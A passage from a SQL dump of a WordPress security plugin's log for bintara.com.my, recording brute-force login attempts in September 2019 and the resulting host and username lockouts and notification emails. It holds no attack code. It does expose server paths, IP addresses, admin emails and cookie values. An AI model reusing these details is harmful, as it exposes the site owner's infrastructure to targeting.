empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=617ae03d6b7b55deedf6ffef66af1411\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZCWHkXpgmG5P@iB8lHPgAAAIk\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"104.197.155.193\";s:11:\"REMOTE_PORT\";s:5:\"38142\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZCWHkXpgmG5P@iB8lHPgAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079896.2556\";s:12:\"REQUEST_TIME\";s:10:\"1569079896\";}}','notice','2019-09-21 15:31:38','2019-09-21 15:31:36',27569448,29123480,'https://bintara.com.my/test/wp-login.php',1,0,'104.197.155.193'),(26683,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:31:36\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:31:36\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:31:36\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:31:36\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:31:38','2019-09-21 15:31:36',27650968,29123480,'https://bintara.com.my/test/wp-login.php',1,0,'104.197.155.193'),(26684,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:31:38','2019-09-21 15:31:36',28011608,29123480,'https://bintara.com.my/test/wp-login.php',1,0,'104.197.155.193'),(26685,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=25ea7f11eb85368955527f1e1cb956c4\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZCfEnlR@6WyRVzpiDuKwAAAAk\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"50.63.12.204\";s:11:\"REMOTE_PORT\";s:5:\"38366\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZCfEnlR@6WyRVzpiDuKwAAAAk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079932.7623\";s:12:\"REQUEST_TIME\";s:10:\"1569079932\";}}','notice','2019-09-21 15:32:14','2019-09-21 15:32:13',27571704,29122944,'https://bintara.com.my/blog/wp-login.php',1,0,'50.63.12.204'),(26686,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:32:13\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:32:13\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:32:13\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:32:13\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:32:14','2019-09-21 15:32:13',27653208,29122944,'https://bintara.com.my/blog/wp-login.php',1,0,'50.63.12.204'),(26687,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:32:14','2019-09-21 15:32:13',28013792,29122944,'https://bintara.com.my/blog/wp-login.php',1,0,'50.63.12.204'),(26688,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=17d08def00bf1a7199786a883ceddc6a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZClnkXpgmG5P@iB8lHTwAAAJY\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"162.144.126.104\";s:11:\"REMOTE_PORT\";s:5:\"44458\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZClnkXpgmG5P@iB8lHTwAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079958.6082\";s:12:\"REQUEST_TIME\";s:10:\"1569079958\";}}','notice','2019-09-21 15:32:40','2019-09-21 15:32:39',27567568,29117888,'https://bintara.com.my/wp/wp-login.php',1,0,'162.144.126.104'),(26689,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:32:39\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:32:39\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:32:39\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:32:39\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:32:40','2019-09-21 15:32:39',27649176,29117888,'https://bintara.com.my/wp/wp-login.php',1,0,'162.144.126.104'),(26690,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:32:40','2019-09-21 15:32:39',28010296,29117888,'https://bintara.com.my/wp/wp-login.php',1,0,'162.144.126.104'),(26691,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=8db90f3226620b2ae5641936c103a85b\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZCxHkXpgmG5P@iB8lHYQAAAJA\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.79.223\";s:11:\"REMOTE_PORT\";s:5:\"36970\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZCxHkXpgmG5P@iB8lHYQAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569080004.1903\";s:12:\"REQUEST_TIME\";s:10:\"1569080004\";}}','notice','2019-09-21 15:33:25','2019-09-21 15:33:24',27569280,29119264,'https://bintara.com.my/test/wp-login.php',1,0,'162.144.79.223'),(26692,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:33:24\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:33:24\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:33:24\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:33:24\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:33:25','2019-09-21 15:33:24',27650720,29119264,'https://bintara.com.my/test/wp-login.php',1,0,'162.144.79.223'),(26693,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:33:25','2019-09-21 15:33:24',28011640,29119264,'https://bintara.com.my/test/wp-login.php',1,0,'162.144.79.223'),(26694,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=1eaf2979c7c2909f4bf70c69244365b2\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZC9knlR@6WyRVzpiDulAAAAAE\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:10:\"36.92.1.31\";s:11:\"REMOTE_PORT\";s:5:\"54406\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZC9knlR@6WyRVzpiDulAAAAAE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569080054.6893\";s:12:\"REQUEST_TIME\";s:10:\"1569080054\";}}','notice','2019-09-21 15:34:16','2019-09-21 15:34:15',27570152,29122136,'https://bintara.com.my/2019/wp-login.php',1,0,'36.92.1.31'),(26695,0,'lockout','host-lockout::36.92.1.31','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:10:\"36.92.1.31\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:34:15\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:34:15\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:34:15\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:34:15\";s:12:\"lockout_host\";s:10:\"36.92.1.31\";}','action','2019-09-21 15:34:16','2019-09-21 15:34:15',27652712,29122136,'https://bintara.com.my/2019/wp-login.php',1,0,'36.92.1.31'),(26696,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:10:\"36.92.1.31\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:34:15\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:34:15\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:34:15\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:34:15\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:34:16','2019-09-21 15:34:15',27652752,29122136,'https://bintara.com.my/2019/wp-login.php',1,0,'36.92.1.31'),(26697,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:34:16','2019-09-21 15:34:15',28014088,29122136,'https://bintara.com.my/2019/wp-login.php',1,0,'36.92.1.31'),(26698,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=36a10dd2efc3008e5ca552cbbb39d5da\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZDM0nlR@6WyRVzpiDuuwAAABI\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"107.189.2.90\";s:11:\"REMOTE_PORT\";s:5:\"51280\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"web